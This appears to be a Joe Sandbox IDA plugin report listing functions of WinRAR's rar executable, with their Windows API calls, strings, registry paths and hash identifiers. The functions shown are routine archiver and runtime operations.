Instruction ID: c1d1bf34ca1aa2e1b454f6917b50cbb90e5fab9880eabec5429227f304e0c461
Opcode Fuzzy Hash: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
Instruction Fuzzy Hash: 99C2E67A90C1B3C1EB369B2480641BD2791EF21794F784935FA4ECB2C9DEAEE546C350

Function 00007FF60E5C1884 Relevance: 24.1, APIs: 5, Strings: 8, Instructions: 1374COMMON

Download Yara Rule

Strings

%s%s , xrefs: 00007FF60E5C2A46
sfx, xrefs: 00007FF60E5C1884
,6, xrefs: 00007FF60E5C2F83
.ext, xrefs: 00007FF60E5C18C0
q:, xrefs: 00007FF60E5C19DA
rar, xrefs: 00007FF60E5C18AA
exe, xrefs: 00007FF60E5C1897
BK, xrefs: 00007FF60E5C19C5

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID:
String ID: %s%s $.ext$exe$rar$sfx$,6$BK$q:
API String ID: 0-1660254149
Opcode ID: c2369d2e3c74217ef505e2eec276ef1c21a4c5d2cf15e006b71fca984afe60b6
Instruction ID: 5647b9227b3bf75fc38565edb1796069533591c0aa533fd4f6033c488b717d34
Opcode Fuzzy Hash: c2369d2e3c74217ef505e2eec276ef1c21a4c5d2cf15e006b71fca984afe60b6
Instruction Fuzzy Hash: 7FE20126B09BE289EB22DF25D8701FD27A1FB65788F650831EA4D87796DF3AD544C300

Function 00007FF60E6048CC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF60E604AE0: FreeLibrary.KERNEL32(?,?,00000000,00007FF60E5DCC90), ref: 00007FF60E604AF5

GetModuleFileNameW.KERNEL32(?,?,?,00007FF60E5F7E7D), ref: 00007FF60E60492E
GetVersionExW.KERNEL32(?,?,?,00007FF60E5F7E7D), ref: 00007FF60E60496A
LoadLibraryExW.KERNELBASE(?,?,?,00007FF60E5F7E7D), ref: 00007FF60E604993
LoadLibraryW.KERNEL32(?,?,?,00007FF60E5F7E7D), ref: 00007FF60E60499F

Strings

rarlng.dll, xrefs: 00007FF60E60493A

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: Library$Load$FileFreeModuleNameVersion
String ID: rarlng.dll
API String ID: 2520153904-1675521814
Opcode ID: 4ea004210bc8b62a292722e0c73661c8a5f08de7266e224b8a6e63eb6450ac69
Instruction ID: 2a546c0f6d96a7acf6053da2a00e67824ee68d701b061107d4dcbf90b05265a7
Opcode Fuzzy Hash: 4ea004210bc8b62a292722e0c73661c8a5f08de7266e224b8a6e63eb6450ac69
Instruction Fuzzy Hash: E6318132B28A7285FB749F61F8402E92760FB64784FA04135FA4D83695DF3DE549D700

Function 00007FF60E5E46EC Relevance: 7.6, APIs: 5, Instructions: 99
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,00000000,?,?,00007FF60E5E4620,?,00000000,?,00007FF60E607A8C), ref: 00007FF60E5E4736
FindFirstFileW.KERNEL32(?,00000000,?,?,00007FF60E5E4620,?,00000000,?,00007FF60E607A8C), ref: 00007FF60E5E476B
GetLastError.KERNEL32(?,00000000,?,?,00007FF60E5E4620,?,00000000,?,00007FF60E607A8C), ref: 00007FF60E5E477A
FindNextFileW.KERNELBASE(?,?,00000000,?,?,00007FF60E5E4620,?,00000000,?,00007FF60E607A8C), ref: 00007FF60E5E47A4
GetLastError.KERNEL32(?,00000000,?,?,00007FF60E5E4620,?,00000000,?,00007FF60E607A8C), ref: 00007FF60E5E47B2

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next
String ID:
API String ID: 869497890-0
Opcode ID: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
Instruction ID: 0bf80d8f367b8b19b516b80462d802fbe79013f8f388cb002f8db9812dfb99f7
Opcode Fuzzy Hash: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
Instruction Fuzzy Hash: 67410332B18A9196EA699B35E4502E963A0FB697B4F100731FB7D833C5EF7CE1598700

Function 00007FF60E5D901C Relevance: 4.5, APIs: 3, Instructions: 35encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32 ref: 00007FF60E5D904D
CryptGenRandom.ADVAPI32 ref: 00007FF60E5D9061
CryptReleaseContext.ADVAPI32 ref: 00007FF60E5D9074

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID:
API String ID: 1815803762-0
Opcode ID: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
Instruction ID: 1c73ef98cdc7e58576d727326e53de5f8e06b85e179a73970955791b0d9bd050
Opcode Fuzzy Hash: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
Instruction Fuzzy Hash: CA01622AB1866582E7509B26B5543296762EBD4FD0F288431EF4D83764CF7DD5468700

Function 00007FF60E5CB540 Relevance: 2.0, APIs: 1, Instructions: 490COMMON

Download Yara Rule

APIs

CharToOemA.USER32 ref: 00007FF60E5CB900

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: Char
String ID:
API String ID: 751630497-0
Opcode ID: 186ef3fc3377d62e9400f60c1346a6d63701ca899d0dd8cde323f7fd028d12cd
Instruction ID: c737c16f557b0e6f1853149be3512c7b086acebbda0691d43e05f5a5001a58b2
Opcode Fuzzy Hash: 186ef3fc3377d62e9400f60c1346a6d63701ca899d0dd8cde323f7fd028d12cd
Instruction Fuzzy Hash: F822E532B086A29AE756CF30D4611FE7BA0FB60748F644D31EA8D87299DE7DE941C740

Function 00007FF60E5EAE10 Relevance: 1.7, APIs: 1, Instructions: 177COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00007FF60E5EB0C7

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68d51678d7948748aabfc2228ef06bec8285962a52d5453e80891cee1563c769
Instruction ID: 33d037864b7e05d084a63812cd93f725526a7e242cfe7d376a7d3e7cec2c37f8
Opcode Fuzzy Hash: 68d51678d7948748aabfc2228ef06bec8285962a52d5453e80891cee1563c769
Instruction Fuzzy Hash: B5713332B16A9182D709DF69E4053EC3391FB88B98F284135EF5CCB399EF79A0518790

Function 00007FF60E603EA8 Relevance: 25.0, APIs: 3, Strings: 11, Instructions: 491
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcschr.LIBVCRUNTIME ref: 00007FF60E603EF9
GetModuleFileNameW.KERNEL32(?,?,?,?,?,?,?,?,00007FF60E603E8F,?,00007FF60E5F7E90), ref: 00007FF60E603F14
snprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF60E6043C6

Strings

DIALOG, xrefs: 00007FF60E604227
MENU, xrefs: 00007FF60E604235
@%s:, xrefs: 00007FF60E6043A5
*messages***, xrefs: 00007FF60E604080
$%s:, xrefs: 00007FF60E60439E
RTL, xrefs: 00007FF60E60437A
\, xrefs: 00007FF60E604519
DIRECTION, xrefs: 00007FF60E604243
STRINGS, xrefs: 00007FF60E604219
*messages***, xrefs: 00007FF60E604050
,, xrefs: 00007FF60E6043FB

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: FileModuleNamesnprintfwcschr
String ID: ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS$\
API String ID: 602362809-1645646101
Opcode ID: bace2d2c65f060087d1e392495a2526bf2bc97d135f43877d2507ce5e202d588
Instruction ID: b635a2ac376262f797d62b56861353503aa4e43871b25ae4c81397b975d55771
Opcode Fuzzy Hash: bace2d2c65f060087d1e392495a2526bf2bc97d135f43877d2507ce5e202d588
Instruction Fuzzy Hash: DE22D122A396B294EB31DB15E4502BE2361FF64784FA04136FA5EC76D5EF2CE904D340

Function 00007FF60E5D4FD0 Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 293
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcschr.LIBVCRUNTIME ref: 00007FF60E5D5043
wcschr.LIBVCRUNTIME ref: 00007FF60E5D5129

Strings

.rar, xrefs: 00007FF60E5D50E6
FUADPXETK, xrefs: 00007FF60E5D503C
.part, xrefs: 00007FF60E5D50A5
AFUMD, xrefs: 00007FF60E5D5122
stdin, xrefs: 00007FF60E5D52C2
.rar, xrefs: 00007FF60E5D508E

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: wcschr
String ID: .part$.rar$.rar$AFUMD$FUADPXETK$stdin
API String ID: 1497570035-1281034975
Opcode ID: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
Instruction ID: 344b4bef9c7040a125b2bcb6bf4902794f15f9de1c5d4b547e6b3a8b5eec1698
Opcode Fuzzy Hash: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
Instruction Fuzzy Hash: 70C1C725A1CAA2D0EA37AF35D9711FC1351EF66784F644831F94ECA6DAEE2EE504C301

Function 00007FF60E607F24 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 100
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF60E60805C

Part of subcall function 00007FF60E60B3F0: GetSystemDirectoryW.KERNEL32(00000000,00007FF60E607F72), ref: 00007FF60E60B41E

GetProcAddressForCaller.KERNELBASE ref: 00007FF60E607F88
GetProcAddress.KERNEL32 ref: 00007FF60E607FA3

Strings

CryptUnprotectMemory, xrefs: 00007FF60E607F95
CryptProtectMemory, xrefs: 00007FF60E607F7E
Crypt32.dll, xrefs: 00007FF60E607F66
CryptProtectMemory failed, xrefs: 00007FF60E608009
CryptUnprotectMemory failed, xrefs: 00007FF60E608053

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: AddressProc$CallerCurrentDirectoryProcessSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
API String ID: 1389829785-2207617598
Opcode ID: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
Instruction ID: d0e42c71e80d6d68798fa4eb15afa69984c2b39f528421810cddb753584e435e
Opcode Fuzzy Hash: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
Instruction Fuzzy Hash: F741AE21A2DBB391FA45DB22B80057A6761BF65BD4F281131FC2E877A5DE7CF446A300

Function 00007FF60E61B0FC Relevance: 13.6, APIs: 9, Instructions: 92
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_initialize_crt.LIBCMT ref: 00007FF60E61B110

Part of subcall function 00007FF60E61AA8C: __isa_available_init.LIBCMT ref: 00007FF60E61AAA9
Part of subcall function 00007FF60E61AA8C: __vcrt_initialize.LIBVCRUNTIME ref: 00007FF60E61AAAE

__scrt_fastfail.LIBCMT ref: 00007FF60E61B11E

Part of subcall function 00007FF60E61B52C: IsProcessorFeaturePresent.KERNEL32 ref: 00007FF60E61B548
Part of subcall function 00007FF60E61B52C: RtlCaptureContext.KERNEL32 ref: 00007FF60E61B571
Part of subcall function 00007FF60E61B52C: RtlLookupFunctionEntry.KERNEL32 ref: 00007FF60E61B58B
Part of subcall function 00007FF60E61B52C: RtlVirtualUnwind.KERNEL32 ref: 00007FF60E61B5CC
Part of subcall function 00007FF60E61B52C: IsDebuggerPresent.KERNEL32 ref: 00007FF60E61B620
Part of subcall function 00007FF60E61B52C: SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF60E61B641
Part of subcall function 00007FF60E61B52C: UnhandledExceptionFilter.KERNEL32 ref: 00007FF60E61B64C

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF60E61B12C
__scrt_fastfail.LIBCMT ref: 00007FF60E61B143
__scrt_release_startup_lock.LIBCMT ref: 00007FF60E61B1A0
__scrt_is_nonwritable_in_current_image.LIBCMT ref: 00007FF60E61B1B6
__scrt_is_nonwritable_in_current_image.LIBCMT ref: 00007FF60E61B1E6
__scrt_is_managed_app.LIBCMT ref: 00007FF60E61B21B
__scrt_uninitialize_crt.LIBCMT ref: 00007FF60E61B239

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled__scrt_fastfail__scrt_is_nonwritable_in_current_image$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual__isa_available_init__scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock__scrt_uninitialize_crt__vcrt_initialize
String ID:
API String ID: 552178382-0
Opcode ID: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
Instruction ID: bc70ff2853fa35d999b39028133bdb6126dad851bf35856997f8946f0dcb8285
Opcode Fuzzy Hash: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
Instruction Fuzzy Hash: CF317211E2C6A3C1FA56ABA4F5563B91391AF75784F6840B8FA0DC72D3DE2CE804A341

Function 00007FF60E604774 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,?,?,?,?,00007FF60E60495D,?,?,?,00007FF60E5F7E7D), ref: 00007FF60E6047DB
RegQueryValueExW.ADVAPI32(?,?,?,?,?,00007FF60E60495D,?,?,?,00007FF60E5F7E7D), ref: 00007FF60E604831
ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,00007FF60E60495D,?,?,?,00007FF60E5F7E7D), ref: 00007FF60E604853
RegCloseKey.ADVAPI32(?,?,?,?,?,00007FF60E60495D,?,?,?,00007FF60E5F7E7D), ref: 00007FF60E6048A6

Strings

LanguageFolder, xrefs: 00007FF60E604806
Software\WinRAR\General, xrefs: 00007FF60E6047CD

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: CloseEnvironmentExpandOpenQueryStringsValue
String ID: LanguageFolder$Software\WinRAR\General
API String ID: 1800380464-3408810217
Opcode ID: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
Instruction ID: 9c2b1644c519e111a192dece6bb6653edc2ffd4a43d4b6ab521aa1c0eb0aad76
Opcode Fuzzy Hash: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
Instruction Fuzzy Hash: FE31A122738AA281EB60DB61F8542BA6351FF947A4F504231FE5D87BD9EF6CD148D700

Function 00007FF60E5F4398 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,?,?,?,00000800,00000000,00000000,00007FF60E5F38CB,?,?,?,00007FF60E5F41EC), ref: 00007FF60E5F43D1
RegQueryValueExW.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF60E5F38CB,?,?,?,00007FF60E5F41EC), ref: 00007FF60E5F4402
RegCloseKey.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF60E5F38CB,?,?,?,00007FF60E5F41EC), ref: 00007FF60E5F440D
GetModuleFileNameW.KERNEL32(?,?,?,?,00000800,00000000,00000000,00007FF60E5F38CB,?,?,?,00007FF60E5F41EC), ref: 00007FF60E5F443E

Strings

AppData, xrefs: 00007FF60E5F43F7
Software\WinRAR\Paths, xrefs: 00007FF60E5F43BC

Memory Dump Source

